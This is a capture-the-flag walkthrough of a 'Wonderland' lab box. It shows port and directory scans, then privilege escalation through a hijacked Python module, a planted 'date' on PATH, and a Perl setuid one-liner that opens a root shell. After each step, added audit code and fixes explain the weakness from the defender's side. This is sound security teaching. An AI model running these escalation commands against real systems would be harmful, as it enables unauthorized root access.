Wonderland

Fall down the rabbit hole and enter wonderland.

Scanning

Nmap

$ nmap -sV -sC 10.10.59.87       

Starting Nmap 7.60 ( https://nmap.org ) at 2021-10-02 00:02 BST
Nmap scan report for ip-10-10-59-87.eu-west-1.compute.internal (10.10.59.87)
Host is up (0.0012s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8e:ee:fb:96:ce:ad:70:dd:05:a9:3b:0d:b0:71:b8:63 (RSA)
|   256 7a:92:79:44:16:4f:20:43:50:a9:a8:47:e2:c2:be:84 (ECDSA)
|_  256 00:0b:80:44:e6:3d:4b:69:47:92:2c:55:14:7e:2a:c9 (EdDSA)
80/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Follow the white rabbit.
MAC Address: 02:F4:A0:15:1D:53 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.11 seconds

Enumeration

Gobuster

$ gobuster dir -u http://10.10.59.87 -w /usr/share/wordlists/dirb/big.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.59.87
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2021/10/02 00:03:13 Starting gobuster
===============================================================
/img (Status: 301)
/poem (Status: 301)
/r (Status: 301)
===============================================================
2021/10/02 00:03:14 Finished
===============================================================

/img and /poem contain nothing interesting (no binaries).

check /r

We reuse the same gobuster command, appending each newly discovered directory to the URL.

In this case we use a single-letter alphabet wordlist:

$ gobuster dir -u http://10.10.59.87/r/ -w alpha.txt
/a
$ gobuster dir -u http://10.10.59.87/r/a -w alpha.txt
/b
$ gobuster dir -u http://10.10.59.87/r/a/b -w alpha.txt
/b
$ gobuster dir -u http://10.10.59.87/r/a/b/b -w alpha.txt
/i
$ gobuster dir -u http://10.10.59.87/r/a/b/b/i -w alpha.txt
/t
$ gobuster dir -u http://10.10.59.87/r/a/b/b/i/t -w alpha.txt

The end: nowhere further to go.

Open http://10.10.59.87/r/a/b/b/i/t in a browser.

View the page source.

Initial Access

SSH into the target using the credentials found in the page source.

Privilege Escalation

Horizontal Escalation to Rabbit

Check whether alice has any sudo privileges:

alice@wonderland:~$ sudo -l
[sudo] password for alice: 
Matching Defaults entries for alice on wonderland:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alice may run the following commands on wonderland:
    (rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py

alice can run the script walrus_and_the_carpenter.py as rabbit.

Inspect walrus_and_the_carpenter.py: the code imports the Python library random. Python searches the directory containing the script before the standard library, so we can hijack this library.

Read more in the Python library hijacking article.

Create a fake library with the same name:

alice@wonderland:~$ echo "import os
os.system('/bin/bash')" > random.py

Run walrus_and_the_carpenter.py as rabbit:

alice@wonderland:~$ sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
rabbit@wonderland:~$ 
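The weakness exploited above is that a sudo rule runs a script out of a directory the caller controls, and Python puts that directory at the front of sys.path, so a file named random.py beside the script wins over the standard library. The following audit is an added example, not code from the writeup or the room: it lists a script's top-level imports, flags any that a same-named file or package in the script's own directory would shadow, and reports whether the calling uid controls that directory. The function names and the scenario built in demo() (a script importing random, a planted random.py in a temporary directory) are constructed for the example.

```python
import ast
import os
import stat
import tempfile


def top_level_imports(source):
    """Return the set of top-level module names a Python source imports."""
    names = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            for alias in node.names:
                names.add(alias.name.split(".")[0])
        elif isinstance(node, ast.ImportFrom) and node.level == 0 and node.module:
            names.add(node.module.split(".")[0])
    return names


def shadowed_imports(script_path):
    """Imports that a same-named module or package beside the script would win,
    because sys.path[0] is the script's directory when it is run directly."""
    script_dir = os.path.dirname(os.path.abspath(script_path))
    with open(script_path) as fh:
        modules = top_level_imports(fh.read())
    shadowed = set()
    for mod in modules:
        as_module = os.path.join(script_dir, mod + ".py")
        as_package = os.path.join(script_dir, mod, "__init__.py")
        if os.path.isfile(as_module) or os.path.isfile(as_package):
            shadowed.add(mod)
    return shadowed


def dir_controlled_by(path, uid):
    """True if uid owns the directory or group/world can write to it,
    i.e. that user could plant a module there."""
    st = os.stat(path)
    return st.st_uid == uid or bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def demo():
    """Constructed scenario mirroring the writeup: a script importing random,
    living in a directory owned by the invoking user, with random.py beside it."""
    with tempfile.TemporaryDirectory() as tmp:
        script = os.path.join(tmp, "walrus_and_the_carpenter.py")
        with open(script, "w") as fh:
            fh.write("import random\nimport sys\nprint(random.choice(['walrus', 'carpenter']))\n")
        with open(os.path.join(tmp, "random.py"), "w") as fh:
            fh.write("# planted module standing in for the stdlib random (constructed)\n")
        with open(script) as fh:
            imports = top_level_imports(fh.read())
        return {
            "imports": imports,
            "shadowed": shadowed_imports(script),
            "dir_controlled_by_caller": dir_controlled_by(tmp, os.getuid()),
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```

Run against the real rule, the check would report random as shadowable and /home/alice as controlled by alice; the fix on the defender's side is to keep scripts referenced by sudo rules in a root-owned, non-writable directory (or to run them with python3 -I, which drops the script directory and user site-packages from sys.path).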

Horizontal Escalation to Hatter

Check rabbit's home directory: the teaParty binary is here.

Run it.

It seems to trigger the date command, and since the command is resolved through $PATH:

  • write the command you want to execute into a file with the same name (date)

  • prepend that file's directory to the PATH variable

  • run the binary

rabbit@wonderland:/home/rabbit$ echo "/bin/bash" > date 
rabbit@wonderland:/home/rabbit$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
rabbit@wonderland:/home/rabbit$ pwd
/home/rabbit
rabbit@wonderland:/home/rabbit$ export PATH=/home/rabbit:$PATH
rabbit@wonderland:/home/rabbit$ echo $PATH
/home/rabbit:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
rabbit@wonderland:/home/rabbit$ chmod 777 date 
rabbit@wonderland:/home/rabbit$ ./teaParty 
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by hatter@wonderland:/home/rabbit$ 
hatter@wonderland:/home/rabbit$ whoami
hatter
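teaParty falls to the steps above because it executes date by bare name while honouring the caller's PATH. The audit below is an added example, not part of the writeup: audit_path() reports, for each PATH entry, why a program running with another user's privileges should not trust it (relative entry, missing, group/world-writable, not root-owned), and resolve_command() shows which file a bare name like date would actually run, searching PATH in the same order execvp() does. The function names and the directories built in demo() (a writable home holding a fake date, and a "bin" directory standing in for /bin) are constructed for the example.

```python
import os
import stat
import tempfile

OTHER_WRITE = stat.S_IWGRP | stat.S_IWOTH


def entry_problems(entry):
    """Reasons one PATH entry cannot be trusted when a privileged program
    executes commands by bare name."""
    if entry in ("", "."):
        return ["resolves to the current working directory"]
    if not os.path.isabs(entry):
        return ["relative path"]
    try:
        st = os.stat(entry)
    except FileNotFoundError:
        return ["does not exist"]
    if not stat.S_ISDIR(st.st_mode):
        return ["not a directory"]
    problems = []
    if st.st_mode & OTHER_WRITE:
        problems.append("group- or world-writable")
    if st.st_uid != 0:
        problems.append("not owned by root")
    return problems


def audit_path(path_value):
    """Map every PATH entry to its list of problems (empty list means fine)."""
    return {entry: entry_problems(entry) for entry in path_value.split(":")}


def resolve_command(name, path_value):
    """First executable named `name` along PATH, in the order execvp() searches."""
    for entry in path_value.split(":"):
        candidate = os.path.join(entry or ".", name)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return candidate
    return None


def demo():
    """Constructed scenario mirroring the writeup: a user-owned directory
    prepended to PATH that holds a fake `date`, versus the system copy."""
    with tempfile.TemporaryDirectory() as home:
        system_bin = os.path.join(home, "bin")  # stands in for /bin (constructed)
        os.mkdir(system_bin)
        real_date = os.path.join(system_bin, "date")
        with open(real_date, "w") as fh:
            fh.write("#!/bin/sh\necho real date\n")
        os.chmod(real_date, 0o755)
        fake_date = os.path.join(home, "date")
        with open(fake_date, "w") as fh:
            fh.write("#!/bin/sh\necho planted file ran instead of date\n")
        os.chmod(fake_date, 0o755)
        os.chmod(home, 0o777)  # anyone can write here, like the chmod in the writeup
        safe_path = system_bin
        hijacked_path = home + ":" + system_bin
        audit = audit_path(hijacked_path)
        return {
            "home_problems": audit[home],
            "safe_runs_real": resolve_command("date", safe_path) == real_date,
            "hijacked_runs_fake": resolve_command("date", hijacked_path) == fake_date,
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```

The defensive fixes are on the program's side: call /bin/date by absolute path, or reset PATH to a fixed root-owned list before spawning anything, the same idea as the secure_path shown in the sudo -l output earlier.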

In hatter's home directory you can find password.txt.

Log in via SSH as hatter.

Vertical Escalation to Root

Check file capabilities:

hatter@wonderland:/home/hatter$ getcap -r / 2>/dev/null
/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep

Perl has cap_setuid+ep, so it can call setuid(0).

Check the GTFOBins entry for Perl capabilities:

hatter@wonderland:~$ perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
# id
uid=0(root) gid=1003(hatter) groups=1003(hatter)
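A capability granted to a general-purpose interpreter is the root-equivalent finding that the getcap listing above exposes. The parser and check below are an added example, not code from the writeup: parse_getcap_line() understands both the older "path = caps" output format shown on this page and the newer "path caps=flags" format of recent libcap, and flag_dangerous() reports every effective-and-permitted capability from a set that lets a process change identity or bypass DAC. The sample input reuses the three lines from the writeup plus one constructed line in the newer format; the capability set and the function names are the example's own.

```python
import os
import re

# Capabilities that give a process a direct route to root when granted to
# an interpreter or other general-purpose binary (see capabilities(7)).
ESCALATION_CAPS = {
    "cap_setuid", "cap_setgid", "cap_dac_override", "cap_dac_read_search",
    "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module", "cap_chown",
    "cap_fowner", "cap_setfcap", "cap_sys_rawio",
}

# Interpreters are the usual offenders: any capability on them is exposed to every script.
INTERPRETER_HINTS = ("perl", "python", "ruby", "php", "node", "lua")

# One clause: comma-separated cap names, an operator, then flag letters.
CLAUSE = re.compile(r"^([a-z0-9_,]+)([+=\-])([eip]*)$")

# First three lines copied from the writeup's getcap output; the fourth is
# constructed to show the newer libcap output format.
SAMPLE_GETCAP = """\
/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep
/usr/bin/ping cap_net_raw=ep
"""


def parse_getcap_line(line):
    """Return (path, {cap_name: flags}) for one getcap line, or None if unparsable."""
    line = line.strip()
    if not line:
        return None
    parts = line.split()
    path = parts[0]
    caps = {}
    for clause in parts[1:]:
        if clause == "=":  # separator used by the older output format
            continue
        match = CLAUSE.match(clause)
        if not match:
            continue
        names, _op, flags = match.groups()
        for name in names.split(","):
            caps[name] = flags
    return path, caps


def flag_dangerous(lines):
    """Return [(path, cap, reason)] for each effective+permitted escalation capability."""
    findings = []
    for line in lines:
        parsed = parse_getcap_line(line)
        if not parsed:
            continue
        path, caps = parsed
        for name, flags in caps.items():
            if name in ESCALATION_CAPS and "e" in flags and "p" in flags:
                reason = "escalation capability effective and permitted"
                if any(hint in os.path.basename(path) for hint in INTERPRETER_HINTS):
                    reason += " on an interpreter"
                findings.append((path, name, reason))
    return findings


def demo():
    """Run the check over the sample listing."""
    return flag_dangerous(SAMPLE_GETCAP.splitlines())


if __name__ == "__main__":
    for path, cap, reason in demo():
        print(path, cap, "-", reason)
```

Both Perl binaries are reported and mtr-packet and ping are not, because cap_net_raw only permits raw sockets. The remediation is to strip the capability (setcap -r /usr/bin/perl) and, if a script genuinely needs it, to give it to a dedicated, non-writable wrapper rather than to the interpreter.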
